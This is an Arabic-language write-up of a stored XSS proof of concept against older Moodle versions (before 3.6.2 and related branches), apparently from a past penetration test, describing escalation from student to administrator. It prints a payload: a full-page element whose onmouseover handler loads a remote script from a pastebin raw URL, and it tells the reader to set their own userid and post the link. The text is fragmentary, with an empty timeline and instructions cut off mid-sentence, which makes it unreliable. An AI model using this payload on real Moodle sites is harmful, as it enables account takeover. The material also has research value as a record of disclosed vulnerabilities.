
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC لتصعيد الامتيازات (من طالب إلى أدمن)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC لتصعيد الامتيازات (من طالب إلى مدير). هذه إحدى الثغرات السابقة التي اكتشفتها خلال اختبار اختراق سابق في مؤسسة أكاديمية. كانت ناجحة بما يكفي في ذلك الوقت لسرقة صلاحيات المدير عمليًا والحصول على تحكم كامل في Moodle باستخدام ثغرة واحدة بسيطة فقط.
يمكننا أن نرى من سجل git أن الثغرة كانت موجودة منذ الإصدارات القديمة من Moodle (2003) وتم إصلاحها فقط في 2019.
الجدول الزمني:
لأغراض تعليمية فقط. لا تستخدم الاستغلال في أنشطة غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.
userid إلى المعرف الخاص بك. لنفترض أن الرابط هو https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ أو ضع رابط تلك الصفحة في منشورك وانتظر.إذا نجحت العملية، ستتم إضافة حسابك كمدير.